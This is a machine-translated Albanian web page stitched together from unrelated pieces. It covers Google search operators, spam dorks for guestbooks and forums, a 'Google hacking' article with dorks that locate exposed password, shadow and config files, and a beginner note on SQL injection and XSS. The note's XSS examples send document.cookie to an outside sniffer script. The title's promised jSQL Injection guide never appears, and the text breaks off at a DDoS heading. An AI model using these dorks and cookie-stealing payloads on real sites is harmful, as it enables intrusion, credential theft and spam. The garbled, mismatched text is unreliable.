Si të konfiguroni telefonat inteligjentë dhe PC. Portali informativ
  • në shtëpi
  • Programet
  • Inurl php emri i tregimit luaj. Udhëzime për përdorimin e jSQL Injection - një mjet shumëfunksional për kërkimin dhe shfrytëzimin e injeksioneve SQL në Kali Linux

Inurl php emri i tregimit luaj. Udhëzime për përdorimin e jSQL Injection - një mjet shumëfunksional për kërkimin dhe shfrytëzimin e injeksioneve SQL në Kali Linux

Si të kërkoni saktë duke përdorur google.com

Të gjithë ndoshta e dinë se si të përdorin një motor kërkimi si Google =) Por jo të gjithë e dinë se nëse hartoni saktë një pyetje kërkimi duke përdorur ndërtime speciale, mund të arrini rezultatet e asaj që kërkoni në mënyrë shumë më efikase dhe më shpejt =) Në këtë artikull Do të përpiqem të tregoj atë dhe çfarë duhet të bëni për të kërkuar saktë

Google mbështet disa operatorë kërkimi të avancuar që kanë kuptim të veçantë kur kërkoni në google.com. Në mënyrë tipike, këto deklarata ndryshojnë kërkimin, ose madje i thonë Google të bëjë kërkime krejtësisht të ndryshme. Për shembull, lidhja: construct është një operator special dhe kërkesa lidhje: www.google.com nuk do t'ju japë një kërkim normal, por në vend të kësaj do të gjeni të gjitha faqet e internetit që kanë lidhje me google.com.
llojet alternative të kërkesave

cache: Nëse përfshini fjalë të tjera në një pyetje, Google do t'i nxjerrë në pah ato fjalë të përfshira brenda dokumentit të ruajtur.
Për shembull, cache: www.web site do të tregojë përmbajtjen e ruajtur me fjalën "web" të theksuar.

lidhje: Pyetja e kërkimit e mësipërm do të shfaqë faqet e internetit që përmbajnë lidhje me pyetjen e specifikuar.
Për shembull: lidhje: www.site do të shfaqë të gjitha faqet që kanë një lidhje me http://www.site

lidhur: Shfaq faqet e internetit që janë "të lidhura" me faqen e caktuar të internetit.
Për shembull, të lidhura: www.google.com do të listojë faqet e internetit që janë të ngjashme me faqen kryesore të Google.

info: Kërko informacion: do të paraqesë disa nga informacionet që Google ka në lidhje me faqen e internetit që po kërkoni.
Për shembull, info: faqe interneti do të tregojë informacione rreth forumit tonë =) (Armada - Forumi i Webmasterëve për të Rritur).

Kërkesa të tjera për informacion

define: Pyetja define: do të japë një përkufizim të fjalëve që futni pas tij, të mbledhura nga burime të ndryshme në internet. Përkufizimi do të jetë për të gjithë frazën e futur (d.m.th., do të përfshijë të gjitha fjalët në pyetjen e saktë).

aksionet: Nëse filloni një pyetje me aksione: Google do të përpunojë pjesën tjetër të termave të pyetjes si simbole të aksioneve dhe do të lidhet me një faqe që tregon informacione të gatshme për këto simbole.
Për shembull, stoqet: Intel yahoo do të tregojë informacione rreth Intel dhe Yahoo. (Vini re se duhet të shkruani simbolet e lajmeve të fundit, jo emrin e kompanisë)

Modifikuesit e pyetjeve

site: Nëse përfshini site: në pyetjen tuaj, Google do t'i kufizojë rezultatet në ato faqe interneti që gjen në atë domen.
Ju gjithashtu mund të kërkoni sipas zonave individuale, të tilla si ru, org, com, etj ( faqe: com site:ru)

allintitle: Nëse kryeni një pyetje me allintitle:, Google do t'i kufizojë rezultatet në të gjitha fjalët e pyetjes në titull.
Për shembull, allintitle: kërkimi në google do të kthejë të gjitha faqet e Google me kërkim si p.sh. imazhe, blog etj

intitle: Nëse përfshini titullin: në pyetjen tuaj, Google do t'i kufizojë rezultatet në dokumente që përmbajnë atë fjalë në titull.
Për shembull, titulli: Biznes

allinurl: Nëse kryeni një pyetje me allinurl: Google do t'i kufizojë rezultatet në të gjitha fjalët e pyetjeve në URL.
Për shembull, allinurl: kërkimi në google do t'i kthejë dokumentet me google dhe do të kërkojë në titull. Gjithashtu, si opsion, mund t'i ndani fjalët me një vijë të pjerrët (/), pastaj fjalët në të dy anët e vijës së pjerrët do të kërkohen brenda së njëjtës faqe: Shembull allinurl: foo/bar

inurl: Nëse përfshini inurl: në pyetjen tuaj, Google do t'i kufizojë rezultatet në dokumente që përmbajnë atë fjalë në URL.
Për shembull, Animacioni inurl:site

intext: kërkon vetëm fjalën e specifikuar në tekstin e faqes, duke shpërfillur tekstet e titullit dhe lidhjes, dhe gjëra të tjera që nuk lidhen me.Ka edhe një derivat të këtij modifikuesi - allintext: d.m.th. më tej, të gjitha fjalët në pyetje do të kërkohen vetëm në tekst, i cili gjithashtu mund të jetë i rëndësishëm, duke injoruar fjalët e përdorura shpesh në lidhje
Për shembull, teksti:forum

daterange: kërkimet brenda një afati kohor (daterange:2452389-2452389), datat për oraret janë në formatin Julian.

Epo, dhe të gjitha llojet e shembujve interesantë të pyetjeve

Shembuj të shkrimit të pyetjeve për Google. Për spammers

Inurl:control.guest?a=sign

Site:books.dreambook.com "URL i faqes kryesore" "Sign my" inurl:sign

Faqja: www.freegb.net Faqja kryesore

Inurl:sign.asp "Numri i karaktereve"

"Mesazhi:" inurl:sign.cfm "Dërguesi:"

Inurl:register.php "Regjistrimi i Përdoruesit" "Uebfaqja"

Inurl:edu/libri i të ftuarve "Nënshkruani librin e të ftuarve"

Inurl: posto "Post koment" "URL"

Inurl:/archives/ "Komente:" "E mbani mend informacionin?"

“Script dhe Guestbook Krijuar nga:” “URL:” “Komente:”

Inurl:?action=add "phpBook" "URL"

Titulli: "Dorëzo histori të re"

Revista

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Libri i mysafirëve"

Blogjet

Inurl:blogger.com/comment.g?”postID””anonim”

Inurl:typepad.com/ "Postoni një koment" "Të mbani mend informacionin personal?"

Inurl:greatestjournal.com/community/ “Posto koment” “adresat e posterave anonimë”

"Posto koment" "adresat e posterave anonimë" -

Titulli: "Posto koment"

Inurl:pirillo.com "Post koment"

Forumet

Inurl:gate.html?”name=Forume” “mode=reply”

Inurl:"forum/posting.php?mode=reply"

Inurl:"mes.php?"

Inurl:"members.html"

Inurl:forum/memberlist.php?”

Hakerimi me Google

Aleksandër Antipov

Motori i kërkimit Google (www.google.com) ofron shumë opsione kërkimi. Të gjitha këto veçori janë një mjet kërkimi i paçmuar për një përdorues të ri në internet dhe në të njëjtën kohë një armë edhe më e fuqishme pushtimi dhe shkatërrimi në duart e njerëzve me qëllime të liga, duke përfshirë jo vetëm hakerët, por edhe kriminelët jo kompjuterikë dhe edhe terroristë.
(9475 shikime në 1 javë)


Denis Barankov
denisNOSPAMixi.ru

Kujdes: Ky artikull nuk është një udhëzues për veprim. Ky artikull është shkruar për ju, administratorë të serverëve WEB, në mënyrë që të humbni ndjenjën e rreme se jeni të sigurt dhe më në fund të kuptoni fshehtësinë e kësaj metode të marrjes së informacionit dhe të merrni detyrën për të mbrojtur faqen tuaj.

Prezantimi

Për shembull, kam gjetur 1670 faqe në 0,14 sekonda!

2. Futni një rresht tjetër, për shembull:

inurl:"auth_user_file.txt"

pak më pak, por kjo tashmë është e mjaftueshme për shkarkim falas dhe hamendje të fjalëkalimit (duke përdorur të njëjtin John The Ripper). Më poshtë do të jap disa shembuj të tjerë.

Pra, ju duhet të kuptoni se motori i kërkimit Google ka vizituar shumicën e faqeve të internetit dhe ka ruajtur informacionin e përfshirë në to. Ky informacion i ruajtur në memorie ju lejon të merrni informacione rreth sajtit dhe përmbajtjes së sajtit pa u lidhur drejtpërdrejt me sitin, vetëm duke u futur në informacionin që ruhet brenda Google. Për më tepër, nëse informacioni në sit nuk është më i disponueshëm, atëherë informacioni në cache mund të ruhet akoma. Gjithçka që ju nevojitet për këtë metodë është të dini disa fjalë kyçe të Google. Kjo teknikë quhet Google Hacking.

Informacioni rreth Google Hacking u shfaq për herë të parë në listën e postimeve të Bugtruck 3 vjet më parë. Në vitin 2001, kjo temë u ngrit nga një student francez. Këtu është një lidhje për këtë letër http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Ai ofron shembujt e parë të pyetjeve të tilla:

1) Indeksi i /admin
2) Indeksi i /fjalëkalimit
3) Indeksi i /mail
4) Indeksi i / +banques +tipi i skedarit:xls (për Francën...)
5) Indeksi i / +passwd
6) Indeksi i / password.txt

Kjo temë bëri bujë në pjesën e internetit të leximit anglez kohët e fundit: pas artikullit të Johnny Long, botuar më 7 maj 2004. Për një studim më të plotë të Google Hacking, ju këshilloj të shkoni në faqen e internetit të këtij autori http://johnny.ihackstuff.com. Në këtë artikull dua t'ju bëj të përditësuar.

Kush mund ta përdorë këtë:
- Gazetarët, spiunët dhe të gjithë ata njerëz që duan të fusin hundën në biznesin e të tjerëve mund ta përdorin këtë për të kërkuar prova inkriminuese.
- Hakerët që kërkojnë objektiva të përshtatshëm për hakerim.

Si funksionon Google.

Për të vazhduar bisedën, më lejoni t'ju kujtoj disa nga fjalët kyçe të përdorura në pyetjet e Google.

Kërkoni duke përdorur shenjën +

Google përjashton fjalët që i konsideron të parëndësishme nga kërkimet. Për shembull, fjalë pyetëse, parafjalë dhe artikuj në anglisht: për shembull janë, of, ku. Në rusisht, Google duket se i konsideron të gjitha fjalët të rëndësishme. Nëse një fjalë përjashtohet nga kërkimi, Google shkruan për të. Në mënyrë që Google të fillojë të kërkojë faqe me këto fjalë, duhet të shtoni një shenjë + pa një hapësirë ​​para fjalës. Për shembull:

as + i bazës

Kërko duke përdorur shenjën -

Nëse Google gjen një numër të madh faqesh nga të cilat duhet të përjashtojë faqet me një temë të caktuar, atëherë mund ta detyroni Google të kërkojë vetëm faqe që nuk përmbajnë fjalë të caktuara. Për ta bërë këtë, ju duhet të tregoni këto fjalë duke vendosur një shenjë përpara secilës - pa një hapësirë ​​para fjalës. Për shembull:

peshkimi - vodka

Kërko duke përdorur ~

Ju mund të dëshironi të kërkoni jo vetëm fjalën e specifikuar, por edhe sinonimet e saj. Për ta bërë këtë, paraprini fjalën me simbolin ~.

Gjetja e një fraze të saktë duke përdorur thonjëza të dyfishta

Google kërkon në çdo faqe për të gjitha dukuritë e fjalëve që keni shkruar në vargun e pyetjes dhe nuk i intereson pozicioni relativ i fjalëve, përderisa të gjitha fjalët e specifikuara janë në faqe në të njëjtën kohë (kjo është veprimi i paracaktuar). Për të gjetur frazën e saktë, duhet ta vendosni në thonjëza. Për shembull:

"ende libri"

Për të pasur të paktën një nga fjalët e specifikuara, duhet të specifikoni në mënyrë eksplicite operacionin logjik: OSE. Për shembull:

siguria e librit OSE mbrojtja

Përveç kësaj, ju mund të përdorni shenjën * në shiritin e kërkimit për të treguar çdo fjalë dhe. për të përfaqësuar çdo personazh.

Kërkimi i fjalëve duke përdorur operatorë shtesë

Ka operatorë kërkimi që janë specifikuar në vargun e kërkimit në formatin:

operatori: term_kërkimi

Hapësirat pranë zorrës së trashë nuk janë të nevojshme. Nëse futni një hapësirë ​​pas dy pikave, do të shihni një mesazh gabimi dhe përpara tij, Google do t'i përdorë ato si një varg normal kërkimi.
Ekzistojnë grupe të operatorëve shtesë të kërkimit: gjuhët - tregoni në cilën gjuhë dëshironi të shihni rezultatin, datën - kufizoni rezultatet për tre, gjashtë ose 12 muajt e fundit, dukuritë - tregoni se ku në dokument duhet të kërkoni rreshti: kudo, në titull, në URL, domenet - kërkoni në sitin e specifikuar ose, anasjelltas, përjashtoni atë nga kërkimi; kërkimi i sigurt - bllokon faqet që përmbajnë llojin e specifikuar të informacionit dhe i heq ato nga faqet e rezultateve të kërkimit.
Në të njëjtën kohë, disa operatorë nuk kërkojnë një parametër shtesë, për shembull, kërkesa "cache:www.google.com" mund të quhet si një varg kërkimi i plotë, dhe disa fjalë kyçe, përkundrazi, kërkojnë një kërkim fjala, për shembull "site:www. google.com help ". Në dritën e temës sonë, le të shohim operatorët e mëposhtëm:

Operatori

Përshkrim

Kërkon një parametër shtesë?

kërkoni vetëm në faqen e specifikuar në search_term

kërkoni vetëm në dokumente me llojin search_term

gjeni faqet që përmbajnë termin e kërkimit në titull

gjeni faqet që përmbajnë të gjitha fjalët e termit të kërkimit në titull

gjeni faqet që përmbajnë fjalën search_term në adresën e tyre

gjeni faqe që përmbajnë të gjitha fjalët e termave të kërkimit në adresën e tyre

Faqja: operatori kufizon kërkimin vetëm në sitin e specifikuar, dhe ju mund të specifikoni jo vetëm emrin e domenit, por edhe adresën IP. Për shembull, futni:

Operatori filetype: Kufizon kërkimin në një lloj skedari specifik. Për shembull:

Që nga data e publikimit të artikullit, Google mund të kërkojë në 13 formate të ndryshme skedarësh:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Formati i tekstit të pasur (rtf)
  • Shockwave Flash (swf)
  • Teksti (përgjigje, txt)

Operatori i lidhjes: Tregon të gjitha faqet që tregojnë në faqen e specifikuar.
Ndoshta është gjithmonë interesante të shohësh se sa vende në internet dinë për ju. Le te perpiqemi:

Operatori i memories: Tregon versionin e sajtit në memorien e Google siç dukej herën e fundit që Google e vizitoi atë faqe. Le të marrim çdo faqe që ndryshon shpesh dhe të shohim:

operatori intitle: Kërkon për një fjalë të caktuar në titullin e një faqeje. Operatori allintitle: është një shtesë - ai kërkon të gjitha fjalët e shumta të specifikuara në titullin e faqes. Krahaso:

titulli: fluturimi për në Mars
intitle:fluturim intitle:në intitle:mars
allintitle:fluturim në mars

Operatori inurl: bën që Google të shfaqë të gjitha faqet që përmbajnë vargun e specifikuar në URL. Operatori allinurl: kërkon të gjitha fjalët në një URL. Për shembull:

allinurl:acid acid_stat_alerts.php

Kjo komandë është veçanërisht e dobishme për ata që nuk kanë SNORT - të paktën ata mund të shohin se si funksionon në një sistem real.

Metodat e hakimit duke përdorur Google

Pra, zbuluam se duke përdorur një kombinim të operatorëve dhe fjalëve kyçe të mësipërme, çdokush mund të mbledhë informacionin e nevojshëm dhe të kërkojë dobësi. Këto teknika shpesh quhen Google Hacking.

Harta e faqes

Mund të përdorni operatorin site: për të listuar të gjitha lidhjet që Google ka gjetur në një sajt. Në mënyrë tipike, faqet që krijohen në mënyrë dinamike nga skriptet nuk indeksohen duke përdorur parametra, kështu që disa sajte përdorin filtra ISAPI në mënyrë që lidhjet të mos jenë në formën /article.asp?num=10&dst=5, por me prerje /article/abc/num/ 10/ dst/5. Kjo bëhet në mënyrë që faqja në përgjithësi të indeksohet nga motorët e kërkimit.

Le te perpiqemi:

faqja: www.whitehouse.gov Whitehouse

Google mendon se çdo faqe në një faqe interneti përmban fjalën Whitehouse. Kjo është ajo që ne përdorim për të marrë të gjitha faqet.
Ekziston edhe një version i thjeshtuar:

site:whitehouse.gov

Dhe pjesa më e mirë është se shokët nga whitehouse.gov as që e dinin që ne shikuam strukturën e faqes së tyre dhe madje shikuam faqet e ruajtura në memorie që shkarkonte Google. Kjo mund të përdoret për të studiuar strukturën e faqeve dhe për të parë përmbajtjen, duke mbetur e pazbuluar për momentin.

Shikoni një listë të skedarëve në drejtori

Serverët WEB mund të shfaqin lista të drejtorive të serverëve në vend të faqeve të rregullta HTML. Kjo zakonisht bëhet për të siguruar që përdoruesit të zgjedhin dhe shkarkojnë skedarë të veçantë. Megjithatë, në shumë raste, administratorët nuk kanë ndërmend të tregojnë përmbajtjen e një drejtorie. Kjo ndodh për shkak të konfigurimit të gabuar të serverit ose mungesës së faqes kryesore në drejtori. Si rezultat, hakeri ka një shans për të gjetur diçka interesante në drejtori dhe ta përdorë atë për qëllimet e tij. Për të gjetur të gjitha faqet e tilla, mjafton të theksohet se të gjitha përmbajnë fjalët: index of. Por meqenëse indeksi i fjalëve përmban jo vetëm faqe të tilla, ne duhet të përsosim pyetjen dhe të marrim parasysh fjalët kyçe në vetë faqen, kështu që pyetjet si:

intitle:indeks.i drejtorisë prind
titull:indeks.i madhësisë së emrit

Meqenëse shumica e listimeve të drejtorive janë të qëllimshme, mund ta keni të vështirë herën e parë të gjeni listime të gabuara. Por të paktën tashmë mund të përdorni listat për të përcaktuar versionin e serverit WEB, siç përshkruhet më poshtë.

Marrja e versionit të serverit WEB.

Njohja e versionit të serverit WEB është gjithmonë e dobishme përpara se të filloni ndonjë sulm hakeri. Përsëri, falë Google, ju mund ta merrni këtë informacion pa u lidhur me një server. Nëse shikoni nga afër listën e drejtorive, mund të shihni se emri i serverit WEB dhe versioni i tij shfaqen aty.

Apache1.3.29 - Server ProXad në trf296.free.fr Porta 80

Një administrator me përvojë mund ta ndryshojë këtë informacion, por, si rregull, është e vërtetë. Kështu, për të marrë këtë informacion mjafton të dërgoni një kërkesë:

titulli:index.of server.at

Për të marrë informacion për një server specifik, ne sqarojmë kërkesën:

intitle:index.of server.at site:ibm.com

Ose anasjelltas, ne jemi duke kërkuar për serverë që ekzekutojnë një version specifik të serverit:

intitle:index.of Apache/2.0.40 Server në

Kjo teknikë mund të përdoret nga një haker për të gjetur një viktimë. Nëse, për shembull, ai ka një shfrytëzim për një version të caktuar të serverit WEB, atëherë ai mund ta gjejë atë dhe të provojë shfrytëzimin ekzistues.

Mund të merrni gjithashtu versionin e serverit duke parë faqet që janë instaluar si parazgjedhje kur instaloni versionin më të fundit të serverit WEB. Për shembull, për të parë faqen e testimit të Apache 1.2.6, thjesht shkruani

titulli:Test.Page.for.Apache it.punoi!

Për më tepër, disa sisteme operative instalojnë dhe lëshojnë menjëherë serverin WEB gjatë instalimit. Megjithatë, disa përdorues nuk janë as të vetëdijshëm për këtë. Natyrisht, nëse shihni se dikush nuk e ka hequr faqen e paracaktuar, atëherë është logjike të supozohet se kompjuteri nuk i është nënshtruar fare personalizimit dhe ka të ngjarë të jetë i prekshëm ndaj sulmit.

Provoni të kërkoni për faqet e IIS 5.0

allintitle:Mirë se vini në Shërbimet e Internetit të Windows 2000

Në rastin e IIS, mund të përcaktoni jo vetëm versionin e serverit, por edhe versionin e Windows dhe Service Pack.

Një mënyrë tjetër për të përcaktuar versionin e serverit WEB është kërkimi i manualeve (faqet e ndihmës) dhe shembujt që mund të instalohen në sajt si parazgjedhje. Hakerët kanë gjetur shumë mënyra për t'i përdorur këta komponentë për të fituar akses të privilegjuar në një faqe. Kjo është arsyeja pse ju duhet t'i hiqni këto përbërës në vendin e prodhimit. Për të mos përmendur faktin që prania e këtyre komponentëve mund të përdoret për të marrë informacion në lidhje me llojin e serverit dhe versionin e tij. Për shembull, le të gjejmë manualin e apache:

modulet e direktivave inurl: manual apache

Përdorimi i Google si një skaner CGI.

Skaneri CGI ose skaneri WEB është një mjet për kërkimin e skripteve dhe programeve të cenueshme në serverin e viktimës. Këto shërbime duhet të dinë se çfarë të kërkojnë, për këtë ata kanë një listë të tërë skedarësh të cenueshëm, për shembull:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Ne mund ta gjejmë secilin prej këtyre skedarëve duke përdorur Google, duke përdorur gjithashtu fjalët index of ose inurl me emrin e skedarit në shiritin e kërkimit: ne mund të gjejmë sajte me skripte të cenueshme, për shembull:

allinurl:/random_banner/index.cgi

Duke përdorur njohuri shtesë, një haker mund të shfrytëzojë dobësinë e një skripti dhe ta përdorë këtë dobësi për të detyruar skriptin të emetojë çdo skedar të ruajtur në server. Për shembull, një skedar fjalëkalimi.

Si të mbroheni nga hakerimi i Google. 1. Mos postoni të dhëna të rëndësishme në serverin WEB.

Edhe nëse i keni postuar të dhënat përkohësisht, mund t'i harroni ose dikush do të ketë kohë t'i gjejë dhe t'i marrë këto të dhëna përpara se t'i fshini ato. Mos e bëj këtë. Ka shumë mënyra të tjera për të transferuar të dhëna që e mbrojnë atë nga vjedhja.

2. Kontrolloni faqen tuaj.

Përdorni metodat e përshkruara për të hulumtuar faqen tuaj. Kontrolloni periodikisht faqen tuaj për metoda të reja që shfaqen në faqen http://johnny.ihackstuff.com. Mos harroni se nëse doni të automatizoni veprimet tuaja, duhet të merrni leje speciale nga Google. Nëse lexoni me kujdes http://www.google.com/terms_of_service.html, atëherë do të shihni frazën: Nuk mund të dërgoni pyetje të automatizuara të asnjë lloji në sistemin e Google pa lejen e shprehur paraprakisht nga Google.

3. Mund të mos keni nevojë që Google të indeksojë faqen tuaj ose një pjesë të saj.

Google ju lejon të hiqni një lidhje në faqen tuaj ose një pjesë të saj nga baza e të dhënave të saj, si dhe të hiqni faqet nga cache. Përveç kësaj, ju mund të ndaloni kërkimin e imazheve në faqen tuaj, të ndaloni shfaqjen e fragmenteve të shkurtra të faqeve në rezultatet e kërkimit. Të gjitha mundësitë për fshirjen e një faqeje përshkruhen në faqe http://www.google.com/remove.html. Për ta bërë këtë, duhet të konfirmoni se jeni me të vërtetë pronari i kësaj faqeje ose të futni etiketa në faqe ose

4. Përdor robots.txt

Dihet që motorët e kërkimit shikojnë skedarin robots.txt që ndodhet në rrënjë të faqes dhe nuk indeksojnë ato pjesë që janë shënuar me fjalën Disallow. Ju mund ta përdorni këtë për të parandaluar indeksimin e një pjese të sajtit. Për shembull, për të parandaluar indeksimin e të gjithë sajtit, krijoni një skedar robots.txt që përmban dy rreshta:

Agjenti i përdoruesit: *
Mos lejo: /

Çfarë ndodh tjetër

Në mënyrë që jeta të mos ju duket si mjaltë, më në fund do të them se ka faqe që monitorojnë ata njerëz që, duke përdorur metodat e përshkruara më sipër, kërkojnë vrima në skriptet dhe serverët WEB. Një shembull i një faqeje të tillë është

Aplikacion.

Pak e ëmbël. Provoni vetë disa nga sa vijon:

1. #mysql dump filetype:sql - kërkoni për depozitat e bazës së të dhënave mySQL
2. Raporti përmbledhës i dobësisë së hostit - do t'ju tregojë se cilat dobësi kanë gjetur njerëzit e tjerë
3. phpMyAdmin funksionon në inurl:main.php - kjo do të detyrojë kontrollin të mbyllet përmes panelit phpmyadmin
4. jo për shpërndarje konfidenciale
5. Kërko Detajet e Kontrollit të Variablave të Serverit të Pemës
6. Vrapimi në modalitetin Fëmijë
7. Ky raport është krijuar nga WebLog
8. titulli:indeksi.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – ndoshta dikush ka nevojë për skedarë konfigurimi të murit të zjarrit? :)
10. titulli:indeksi.i financave.xls – hmm....
11. titulli:Indeksi i bisedave dbconvert.exe – regjistrat e bisedave icq
12.intext:Analiza e trafikut të Tobias Oetiker
13. titulli:Statistikat e përdorimit për Generated by Webalizer
14. titulli:statistikat e statistikave të avancuara të internetit
15. intitle:index.of ws_ftp.ini – ws ftp config
16. inurl:ipsec.secrets mban sekrete të përbashkëta - çelës sekret - gjetje e mirë
17. inurl:main.php Mirë se vini në phpMyAdmin
18. inurl:server-info Informacioni i serverit Apache
19. site:edu notat admin
20. ORA-00921: fundi i papritur i komandës SQL – marrja e shtigjeve
21. titulli:indeks.i trillian.ini
22. titulli:Indeksi i pwd.db
23.titulli:indeksi.i njerezve.lst
24. titulli:indeksi.i masterit.passwd
25.inurl:passlist.txt
26. titulli:Indeksi i .mysql_history
27. titulli:indeksi i tekstit:globals.inc
28. titulli:indeksi.i administratorëve.pwd
29. titulli:Indeksi.e etj hije
30.titulli:index.ofsecring.fq
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hakimi i Google"
  • Qendra e trajnimit "Informzashita" http://www.itsecurity.ru - një qendër kryesore e specializuar në fushën e trajnimit të sigurisë së informacionit (Licenca e Komitetit të Arsimit të Moskës Nr. 015470, Akreditimi Shtetëror Nr. 004251). E vetmja qendër trajnimi e autorizuar për Sistemet e Sigurisë në Internet dhe Clearswift në Rusi dhe vendet e CIS. Qendër trajnimi e autorizuar nga Microsoft (specializimi i sigurisë). Programet e trajnimit koordinohen me Komisionin Teknik Shtetëror të Rusisë, FSB (FAPSI). Certifikatat e trajnimit dhe dokumentet shtetërore për formimin e avancuar.

    SoftKey është një shërbim unik për blerësit, zhvilluesit, tregtarët dhe partnerët e filialeve. Për më tepër, ky është një nga dyqanet më të mira të softuerëve në internet në Rusi, Ukrainë, Kazakistan, i cili u ofron klientëve një gamë të gjerë produktesh, shumë mënyra pagese, përpunim të shpejtë (shpesh të menjëhershëm) të porosive, ndjekje të procesit të porosisë në seksionin personal, të ndryshme zbritje nga dyqani dhe prodhuesit BY.

    Vendosa të flas pak për sigurinë e informacionit. Artikulli do të jetë i dobishëm për programuesit fillestarë dhe ata që sapo kanë filluar të angazhohen në zhvillimin e Frontend. Cili është problemi?

    Shumë zhvillues fillestarë tërhiqen aq shumë me shkrimin e kodit sa harrojnë plotësisht sigurinë e punës së tyre. Dhe më e rëndësishmja, ata harrojnë dobësi të tilla si pyetjet SQL dhe XXS. Ata gjithashtu krijojnë fjalëkalime të lehta për panelet e tyre administrative dhe i nënshtrohen forcës brutale. Cilat janë këto sulme dhe si mund t'i shmangni ato?

    injeksion SQL

    Injeksioni SQL është lloji më i zakonshëm i sulmit në një bazë të dhënash, i cili kryhet gjatë një pyetjeje SQL për një DBMS specifike. Shumë njerëz dhe madje edhe kompani të mëdha vuajnë nga sulme të tilla. Arsyeja është një gabim i zhvilluesit kur shkruani bazën e të dhënave dhe, në mënyrë rigoroze, pyetjet SQL.

    Një sulm i injektimit SQL është i mundur për shkak të përpunimit të gabuar të të dhënave hyrëse të përdorura në pyetjet SQL. Nëse sulmi i një hakeri është i suksesshëm, rrezikoni të humbni jo vetëm përmbajtjen e bazave të të dhënave, por edhe fjalëkalimet dhe regjistrat e paneleve administrative. Dhe këto të dhëna do të jenë mjaft të mjaftueshme për të marrë plotësisht faqen ose për të bërë rregullime të pakthyeshme në të.

    Sulmi mund të riprodhohet me sukses në skriptet e shkruara në PHP, ASP, Perl dhe gjuhë të tjera. Suksesi i sulmeve të tilla varet më shumë nga ajo që përdoret DBMS dhe si zbatohet vetë skripti. Ka shumë site të cenueshme për injeksione SQL në botë. Kjo është e lehtë për t'u verifikuar. Thjesht shkruani "dorks" - këto janë pyetje të veçanta për kërkimin e vendeve të cenueshme. Ja disa prej tyre:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Si t'i përdorni ato? Thjesht futini ato në një motor kërkimi Google ose Yandex. Motori i kërkimit do t'ju japë jo vetëm një sit të cenueshëm, por edhe një faqe në lidhje me këtë dobësi. Por ne nuk do të ndalemi këtu dhe do të sigurohemi që faqja të jetë vërtet e cenueshme. Për ta bërë këtë, mjafton të vendosni një thonjëza të vetme “‘ pas vlerës “id=1”. Diçka si kjo:

    • inurl:games.php?id=1'

    Dhe faqja do të na japë një gabim në lidhje me pyetjen SQL. Çfarë i nevojitet më pas hakerit tonë?

    Dhe pastaj ai ka nevojë për këtë lidhje me faqen e gabimit. Pastaj puna për cenueshmërinë në shumicën e rasteve bëhet në shpërndarjen "Kali linux" me shërbimet e saj për këtë pjesë: futja e kodit të injektimit dhe kryerja e operacioneve të nevojshme. Se si do të ndodhë kjo, nuk mund t'ju them. Por ju mund të gjeni informacione për këtë në internet.

    Sulmi XSS

    Ky lloj sulmi kryhet në skedarët e cookies. Përdoruesit, nga ana tjetër, duan t'i ruajnë ato. Pse jo? Çfarë do të bënim pa to? Në fund të fundit, falë Cookies, nuk duhet të fusim njëqind herë fjalëkalimin për Vk.com ose Mail.ru. Dhe të paktë janë ata që i refuzojnë. Por në internet, shpesh shfaqet një rregull për hakerat: koeficienti i komoditetit është drejtpërdrejt proporcional me koeficientin e pasigurisë.

    Për të zbatuar një sulm XSS, hakeri ynë ka nevojë për njohuri të JavaScript. Në shikim të parë, gjuha është shumë e thjeshtë dhe e padëmshme, sepse nuk ka akses në burimet kompjuterike. Një haker mund të punojë vetëm me JavaScript në një shfletues, por kjo është e mjaftueshme. Në fund të fundit, gjëja kryesore është të futni kodin në faqen e internetit.

    Nuk do të flas në detaje për procesin e sulmit. Unë do t'ju tregoj vetëm bazat dhe kuptimin se si ndodh kjo.

    Një haker mund të shtojë kodin JS në ndonjë forum ose libër të ftuar:

    document.location.href =”http://192.168.1.7/sniff.php?test”

    Skriptet do të na ridrejtojnë në faqen e infektuar, ku do të ekzekutohet kodi: qoftë ai një sniffer, një lloj ruajtjeje ose një shfrytëzim, i cili do të vjedhë disi Cookies tona nga cache.

    Pse JavaScript? Sepse JavaScript është i shkëlqyeshëm në trajtimin e kërkesave në ueb dhe ka akses te "Cookies". Por nëse skripti ynë na çon në ndonjë faqe, përdoruesi do ta vërejë lehtësisht atë. Këtu hakeri përdor një mundësi më dinake - ai thjesht fut kodin në foto.

    Img=Imazhi i ri();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    Ne thjesht krijojmë një imazh dhe i caktojmë skriptin tonë si adresë.

    Si të mbroheni nga e gjithë kjo? Është shumë e thjeshtë - mos klikoni në lidhje të dyshimta.

    Sulmet DoS dhe DDos

